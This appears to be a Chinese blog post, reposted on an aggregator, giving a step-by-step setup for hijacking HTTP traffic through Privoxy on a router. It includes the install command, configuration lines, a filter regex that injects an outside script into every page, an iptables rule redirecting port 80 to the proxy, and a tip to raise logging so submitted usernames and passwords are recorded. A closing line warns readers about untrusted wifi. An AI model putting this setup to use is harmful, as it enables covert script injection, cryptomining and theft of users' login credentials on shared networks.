码迷,mamicode.com
首页 > Web开发 > 详细

利用privoxy劫持http网站数据,插入广告,获取用户名,密码

时间:2018-08-05 21:36:05      阅读:470      评论:0      收藏:0      [点我收藏+]

标签:direct   运行   原理   默认   效果   命令   https   rect   获取   

看了几篇privoxy的文章,感觉讲的都不详细,在此整理一遍。

注:本文下面的内容仅讨论思路,作为技术交流之用,请勿用作非法途径.

Privoxy是一款带过滤功能的代理服务器,针对HTTP、HTTPS协议。通过Privoxy的过滤功能,用户可以保护隐私、对网页内容进行过滤、管理cookies,以及拦阻各种广告等。Privoxy可以用作单机,也可以应用到多用户的网络。

Privoxy基于Internet Junkbuster,按照GNU General Public License进行发布。可以在Linux、Windows、Mac OS X、AmigaOS、BeOS,以及各种Unix上运行。

----来自百度百科

privoxy功能很强大,可以用来过滤广告,那么我们也可以用它来插入广告,甚至淘宝返利....

先上图..

技术分享图片

环境:免费的K3刷官改版.

刷完系统后 安装 privoxy

命令:

opkg install privoxy

然后编辑 config 文件

vi /tmp/media/nand/opt/etc/privoxy/config

修改listen-address 为如下形式

listen-address  192.168.2.1:8118
accept-intercepted-requests 1

192.168.2.1 为 路由器IP 8118为privoxy的默认监听端口

action 文件

vi /tmp/media/nand/opt/etc/privoxy/user.action

加入以下内容 代表拦截所有网址

+filter{ad}}
.*

filter文件

vi /tmp/media/nand/opt/etc/privoxy/user.filter
FILTER: ad Add ad
s||http://www.abc.com/ad.js"> $0|g

很简单的正则,表示在body标签后插入一段js, 这个js里面就控制了想要插入的广告内容.

这里只分析一下原理,就不放示例代码了... 相信各位大神,都会的....

最后一步 把80端口的数据都转发到8118去,即privoxy监听的端口

iptables -t nat -A PREROUTING -s 0.0.0.0/0.0.0.0 -p tcp --dport 80 -j REDIRECT --to-ports 8118

最后的效果就是第一张图...所以的http网站都被插入了一段js 用来执行代码,甚至用来挖矿...

privoxy功能不只是修改网页内容,还可以记录访问记录..
技术分享图片

甚至可以记录下网页提交的表单,这就意味着, 用户名和密码 也在其中..

修改config中的debug级别即可...(默认的日志只记录请求的url.)

至于privoxy还能干嘛,大家自己发挥吧...

所以,,这告诉我们一个道理,不要随便连接陌生wifi...要连接也要尽量访问https网站..

利用privoxy劫持http网站数据,插入广告,获取用户名,密码

标签:direct   运行   原理   默认   效果   命令   https   rect   获取   

原文地址:https://www.cnblogs.com/mysgk/p/9426995.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!